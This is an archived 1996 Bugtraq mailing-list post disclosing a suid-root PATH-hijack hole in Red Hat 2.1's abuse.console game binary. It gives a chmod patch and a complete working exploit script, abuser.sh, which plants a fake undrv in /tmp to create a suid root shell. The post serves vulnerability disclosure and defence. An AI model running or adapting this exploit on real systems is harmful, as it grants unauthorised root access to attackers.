Bugtraq mailing list archives
abuse Red Hat 2.1 security hole
From: davem+ () andrew cmu edu (David J Meltzer)
Date: Fri, 2 Feb 1996 22:28:30 -0500
There is a security hole in Red Hat 2.1, which installs the game abuse, /usr/lib/games/abuse/abuse.console suid root. The abuse.console program loads its files without absolute pathnames, assuming the user is running abuse from the /usr/lib/games/abuse directory. One of these files in the undrv program, which abuse executes as root. If the user is not in the abuse directory when running this, an arbitrary program can be substituted for undrv, allowing the user to execute arbitrary commands as root. If abuse.console needs to be run by users other than root at the console, provisions need to be made in the code to not execute or load any files as root. Program: /usr/lib/games/abuse/abuse.console suid root Affected Operating Systems: Red Hat 2.1 linux distribution Requirements: account on system Patch: chmod -s /usr/lib/games/abuse/abuse.console Security Compromise: root Author: Dave M. (davem () cmu edu) Synopsis: abuse.console runs undrv without an absolute pathname while executing as root, allowing a user to substitute the real undrv with an arbitrary program. Exploit: #!/bin/sh # # abuser.sh # exploits a security hole in abuse to create # a suid root shell /tmp/abuser on a linux # Red Hat 2.1 system with the games package # installed. # # by Dave M. (davem () cmu edu) # echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system echo ================ Checking system vulnerability if test -u /usr/lib/games/abuse/abuse.console then echo ++++++++++++++++ System appears vulnerable. cd /tmp cat << _EOF_ > /tmp/undrv #!/bin/sh /bin/cp /bin/sh /tmp/abuser /bin/chmod 4777 /tmp/abuser _EOF_ chmod +x /tmp/undrv PATH=/tmp echo ================ Executing Abuse /usr/lib/games/abuse/abuse.console /bin/rm /tmp/undrv if test -u /tmp/abuser then echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser else echo ---------------- Exploit failed fi else echo ---------------- This machine does not appear to be vulnerable. fi /-------------\ |David Meltzer| |davem () cmu edu| /--------------------------\ |School of Computer Science| |Carnegie Mellon University| \--------------------------/
Current thread:
- Re: bind() Security Problems, (continued)
- Re: bind() Security Problems dsiebert () icaen uiowa edu (Feb 01)
- Re: bind() Security Problems General Scirocco (Feb 01)
- Re: bind() Security Problems Baba Z Buehler (Feb 05)
- passwd command in AIX 4.1.4 Dave Roberts (Feb 05)
- Re: passwd command in AIX 4.1.4 Chris Burris (Feb 05)
- Re: passwd command in AIX 4.1.4 JaDe (Feb 05)
- CGI security: Escape newlines. Jennifer Myers (Feb 05)
- Re: CGI security: Escape newlines. Dave Andersen (Feb 05)
- Re: CGI security: Escape newlines. Fred Cohen (Feb 06)
- [Fwd: HTTPd 1.5a Security Hole!!! (fwd)] Rogue Agent (Feb 06)
- Re: bind() Security Problems General Scirocco (Feb 01)
- Re: bind() Security Problems dsiebert () icaen uiowa edu (Feb 01)
- abuse Red Hat 2.1 security hole David J Meltzer (Feb 02)
- resizecons Red Hat 2.1 security hole David J Meltzer (Feb 02)